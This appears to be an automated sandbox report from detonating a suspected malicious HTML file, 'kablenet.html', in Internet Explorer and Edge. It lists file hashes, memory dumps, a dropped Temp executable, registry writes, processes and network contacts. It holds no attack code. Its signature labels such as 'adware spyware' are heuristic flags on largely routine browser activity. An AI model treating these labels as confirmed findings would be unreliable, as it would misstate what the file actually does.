SHA256 b3b2da11dbc333ed093b8507bb6f2d513782505588a26cc9a3d6f9e5bb74f5f8
SHA512 2a32f04f7c8a034b539659fde4faabdef7fd2e6032785585c40f9f95253c220c86b58388a1cc79d2ad7622157d26dd23c198a62311bec3fa0227119b913c354a

memory/1808-188-0x0000000000B60000-0x000000000100A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scoped_dir864_1950574921\b41fabab-80a8-4013-b09a-ac0ae292b8fc.tmp

MD5 eae462c55eba847a1a8b58e58976b253
SHA1 4d7c9d59d6ae64eb852bd60b48c161125c820673
SHA256 ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad
SHA512 494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

C:\Users\Admin\AppData\Local\Temp\scoped_dir864_1950574921\CRX_INSTALL\_locales\en_CA\messages.json

MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 05a83e0b8404b63b0bb32816a9af7de0
SHA1 e79d9237b5fadfa394f4020955d0dc1b75b77cf1
SHA256 bd3f9e321bf68ba87d22995e192302c00e14a0e969d43f8f7d670ecdf510c88c
SHA512 0dacceb01f96c317757c95a182114700e15e9e40892e7260be3d026b58757e6f21a89f41471c647c698a81e894df9a0ae64a026b675421177ab762ab428cda42

memory/3604-583-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-584-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-585-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe

MD5 60dd2030e1ff1f9a3406ddc438893694
SHA1 b01f2c39b1046bc892c9db78898e1c063b21836f
SHA256 d77580f219e5b86e38e34d2125862a58d03a76ac1b6dbb40bc4f65b114bbb4ee
SHA512 15f9aad02632481934b3f271debf73d5cf61bdd824d0f4a47e38b391186f7de16ba5f1d51f391625b945ff14b55d90cd31799b1483837aea732a45effef94246

memory/1808-593-0x0000000000B60000-0x000000000100A000-memory.dmp

memory/3604-594-0x0000000000400000-0x0000000000429000-memory.dmp

memory/5240-605-0x0000000000BD0000-0x0000000000C2C000-memory.dmp

memory/5128-608-0x0000000000400000-0x000000000045E000-memory.dmp

memory/5128-610-0x0000000000400000-0x000000000045E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fffde59525dd5af902ac449748484b15
SHA1 243968c68b819f03d15b48fc92029bf11e21bedc
SHA256 26bc5e85dd325466a27394e860cac7bef264e287e5a75a20ea54eec96abd0762
SHA512 f246854e8ed0f88ca43f89cf497b90383e05ffa107496b4c346f070f6e9bbf1d9dc1bdcc28cad6b5c7810e3ba39f27d549061b3b413a7c0dd49faacae68cd645

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\5a4ba937-4697-4a8b-b715-4d8850a08764.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ab283f88362e9716dd5c324319272528
SHA1 84cebc7951a84d497b2c1017095c2c572e3648c4
SHA256 61e4aa4614e645255c6db977ea7da1c7997f9676d8b8c3aaab616710d9186ab2
SHA512 66dff3b6c654c91b05f92b7661985391f29763cf757cc4b869bce5d1047af9fb29bbe37c4097ddcfa021331c16dd7e96321d7c5236729be29f74853818ec1484

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 06eb83ab313d92546cc14b4c004dd873
SHA1 46db5e1788fd7a9fb968ff8d24897c9ac8dad53d
SHA256 c9d65c77c4843b9398c8b6e12417292f8e70c9d7864d39ec912814005c90489f
SHA512 ca598d6ea0c63c7f0ff5a0ae7db3e1807ac34a03b60cba1699aa29bc0ebfaeed8803ecc41e624e2c4fa58f9515a8a90a15608be503023797cc1ebebe1c6353fd

Analysis: behavioral18

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20241023-en

Max time kernel

121s

Max time network

128s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c087871aa688db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774329" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4608EB51-F499-11EF-8504-C668CEC02771} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000abafe974537eba42a70c6cc04c94a12500000000020000000000106600000001000020000000353befe9fe459eb6317b2bc18fad24530b71f8c61b6dfca373a1f275a386f8f9000000000e8000000002000020000000015c01c04859f21174936f41820bdf6a8344a1743f5541c9576b3b8c42f75f722000000080aadfaafa428162cd31eefe0fc6c460f58ac2543bc38f6ff369135df70e7a4f4000000072c8df2cb7070c7b932cdb8b45ed0d43877d393ba67448f17e2430e4b2b15faa049bcdb3207868f1560884cfba81608911a49353c24d70cd8f8f0b4642226bc2 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000abafe974537eba42a70c6cc04c94a12500000000020000000000106600000001000020000000c5dac03c203ccee110a439b991ff01b906b4cdbdd035cca6a2e2ce19e6efd9cb000000000e800000000200002000000036458c6e2d04c28a5eddbb66caa65b9d365df9c5f228f111ce2ec0464a2a4a26900000003e81cdf1a0cadd54a14459cae34de048e66381f68c239c5ad76d9ddea53bd58a67962f5f1ffa417a2a6194d1c08d4110c0af6627c562499accc4112a7aff37d8b88fdb1c91f3b02f6fae73f6b3e1d60b9b00da24d7be17071928752b618cfac998ff5e3884ba3400d57148d736c277fb3423cee7b7d8cceb21b5efd6ff4db5cfaf61830ae22c36f93c20fc5bbd5fbbf6400000001c27e7cd91793376bd956d79baf626313f27652fd7b1c30771e49ebb3ca6b07cc7173a88ec97746ae74eb314b81d837b6fdcc4268b66842c25a43aaf780d090d C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1388 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabCCC4.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarCDE4.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6ef4e09c1ddb79e303cf87cb90a92ac3
SHA1 0f7077b485832147a63fa6150ec8e8bda0f65cec
SHA256 76ce657de7a15759e0417ece1c34d011804296a641a6c487623cdcead14c2dde
SHA512 a3c2da65160b7515683c5caab9fdb3424da8f603d9c1c687cbfb59ddd98cb3a8db1161f27cbc9448033896db9f4f5a45fd497459023872cc25640132bb0e079e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 faa9fb81293de466580c675ff1298d06
SHA1 2ebab92d6fb9ff6349349f9defd0a9fe6aa2b72e
SHA256 ff61b2c6e12913b7702efba9711207820838174564089a7bd165c13375de3a6d
SHA512 332038224dffdd75aa48b4803b2a4f14040b439b0722df514aa3a062733511d868ed98c0993339dc34bf53f90c19641568834cbb96d4969b96d11229fe3e83a8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3e59b908918921d569a0119cf2a5b578
SHA1 1d7c2a8a8b42a23ab6bd3915ca6e4e81189f5f91
SHA256 71a2aaac1b8c2cab6f863b66f05d288beff24554343e880db16598168040a196
SHA512 6c6c516079fcaba98e69126f977db367bd438546c976b3ac04f37e4f3aaf38c544856dcc02d0e48ae46dc2b5f82be63bb52a61df113751ee9ea8557ec3470f19

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dbb54151e5b462eb37623efddde78923
SHA1 5093a8f56bae304fb90445fbf9be292610539ef3
SHA256 c82cf70a392ca8bbb00bdb087b73610e90a84fbaa21eb537cab53e3a396e9137
SHA512 0a0cceac85daa2dbcd7d6e38f4befb839897aed53a25855297afc14c2dcf803d7b709cf8022729728a97708df0b64f34c4fa83e6136fb6615f00691afb8d83f8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 90bc690cc74cfff8180af159e966bca4
SHA1 9f099b20a5e21aba50bc7c8c7dc79ae18b20f821
SHA256 2d2fe0b2948edceaf14a8f7b254c4b133c976cf9300e4a22a4b18751be79f6f5
SHA512 6eb992c7f57dc65fe52162021a43a611e99cee0f27102bd5c1fb6fbd2200cc6b9af65ed452446ba011b666de116d3463117540b308567040d60755145a4b8a54

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 076432608f94a37468386061e35132e9
SHA1 772a08db2cbf191df1f4b08a6f233656262655ce
SHA256 6fdc30af504c54e2296df8369b32dfe2593cf6afbd603d86bfc8ffd317052547
SHA512 57c2b9af5c4f1ced88fbeda38740c48543afbc4a5d4e5f187930d30e2d5e9c1341dc1081184179edc071ee300bbc0401c878a3f5bdd4f21767d4a7927145ef84

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4199804d4c899f5802ac7d141fd09db8
SHA1 40fb940dcf6ebd7a580b751cb630420842b7cc9b
SHA256 c40487f4170352a7ca477b4cd9ef6e8aef7307e9b6abb6d6e1e450c8e535a18a
SHA512 f0cef39f87e0f8eb3b0de80302128a3f152a7bbca456e9b8d03690f8f0e1902598268c1e04dd42b35cb3c72b497b40cfb322652d071f0bfdf39fba9c661084d8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1530ce84bec874bc5988ceaf348f4d73
SHA1 a966d23f1f9d84e29abd4a8385680b62fa464973
SHA256 b9deee0c6891611942a44d2578ba8f97c6bb6f53060990d5de2c5a1d25928cda
SHA512 ae24ed0aa860d209753a5bf741acc39296bf970b65f2f9139260f71cd22fcfc957372bbcbeb363d868b655d577f5a282ff4e12a23b6e454c7ef0e516e58834ca

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 803e5ef796a0e5356db5d4fd2229686d
SHA1 8865b103e6725890da45e38913191ae55e1465cc
SHA256 1e91a440e377ebc95d58748468e2183b2ad4cb67dd957067d74ce4d53041fe4f
SHA512 db79c8d83872bfb9680f17e47bc0fcb5b385f5ec8eeb4f194aefb1f18f0b6bf5254f7f9eed4b3962da5226306267a9a47681410183680a357c5678d2f65c210e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6b83ef21e9cdf1b2fa2debd409100e96
SHA1 f6f0c6cb15ac9a8a032b12462763a879cba0f448
SHA256 a4846adbaf76abe06ea563412e98c9c2e84248b37850b68157813384bec472ed
SHA512 d228976eb7233167b2356b8db50035132c42f1a689e8e3bc18500b487c540fa0c6e83e694883cac9494d575c0a835e287a03d28d33a35a651d10d6d19afc6abc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b9cc1d82dfc0d90f997cbc2411f2e80a
SHA1 75d560b04426dcfb788b08b44dbdcba5b403a9d4
SHA256 4c000e43bd74473ddc1d7d79af662a936e52cd2861ed5ae2eb170a599b1ab4d5
SHA512 c199a4cd17c0581aa64f660f8aa9ee95bc715fb78c1adc4a2bead2f7424ce2a6bac50b6b1528be3427642ef8c689b315a0ba2facf1ec2abae36e85acfe1b47c7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 895ca9c074c4cd71224ba507d6fe7e58
SHA1 d8dd0ec0c507a22f99efd2c448429ddb75a2b668
SHA256 48d40805e2b048caa969d409b5174e238284c05cae516dac65fa67c188aae7b7
SHA512 60460f16a90642a227df0bea7677c38222a2b79e4b82a840cbab51f57088c0b33176a4720ad19c0ae17dc4c4584cca8da4d3a33517128b74487f220b9267d92f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 733080989e517b14201548eb57d3c2d9
SHA1 1b3b0a20e1d5d878597977d508d00fe17c025fda
SHA256 64b06edbd33ae5834af1c47898bb6adc487afe99334add8c8a6e5bc21a32fce2
SHA512 9dc90c1b1621174773560ca6f7f070f18f0a4861d97a5843bb4e7d0d99fcc1e888324b5e3c474d508a965ab548d595cfe0e898ebd5788841efad8ba33d86ffe0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2bedde8852147592f4b46d9ef17d7e13
SHA1 42a1f44dca66206a6c4d87cef87efda760a1e10f
SHA256 ff325fe4a1264b1693de131ea6b4317f1687cb754e97de82aa7e5398cabf722e
SHA512 1cd1b165bd96cfcf6b156f56a9a24769139a11ab06cbc271f84d309b32dcfc1813ba6bd27552a28ac4f31f21b75ce5228f308875b1ddc77517538b7c8e1a8a45

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 90541e256db539eca1dc64a8d20b3b39
SHA1 5de62e2707c96f7113f3e7f17fe3d8520584cb4d
SHA256 97d9795623347da9fdd013494631a1f3659a88a0db201bc397ff1d327f6ba4d4
SHA512 edeea905f31468f7bea2b381b53e5c53bc7264e9df31578050bba56d78de9c7a94c8f32352ad7208073d3634f64a8760a6ffdaef4c69c1a1b3f42deb770ef03d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b483d9e0c0b3b4887c610aa7e8f72abb
SHA1 ec88a9a71b08f4c70524f34d303e0e7e168524fb
SHA256 bb94b68ed18839eec005a9cc55cdd44bed4e93f43b3c43b776e922e122246015
SHA512 131bb147f281bdd19dddf57073bafbe3e81826b45315fef7ace096e33083e94f72ac5be296280f89d28ce3f49e9c4ad10c920576df709f056be2b271347697b2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4235abcf225c2828736e4853a0cbbd92
SHA1 1564658e2b00901a79ef60ba4c53770cadf22168
SHA256 83be666d5a3a1243a791d33b6f15e448a7fd578b57f1485c9bd1f32572ef74db
SHA512 7d331644f8f2c90c210d2012138134f59c87b822b76d00c929560db14aadc9d19580cdf28ec4cf6f01799b9c77b23aa40fb8768b2165f77fdcff736bfbf71088

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 342bd105be285dbc76a3b9bc82eb1ff1
SHA1 21ec13f8510d5567c0428101d228fece5ac60e6d
SHA256 94337536a92c726b9692927afa36071b918e2022b9b1dbd2c785287945210c2b
SHA512 e3c11643941efdba0232043841f45d76e3d73cd2806837912f0c55e17048de3312eee23ad56d80e638d74a53c03b29df1f9528396efcd0b2589996f4deea5128

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 45dfa035d9cb4879f49969f2427c0097
SHA1 c7e3fbb2d23abb14bc3bb669c5819910c0b985a9
SHA256 d646e0de41785fd7c63ca0c52d622d7e0b4888cdf670a11aae37110fbca95b27
SHA512 d8d379a5c5bfec28dad19c0a59b2afc8cbf6cccd032aecbf8cbc4d5dd3ad1f67f1c447f9b5879ff9e0d596ac549bdcc091080b4dcd59fd4cc28f449019d3aea6

Analysis: behavioral19

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

128s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
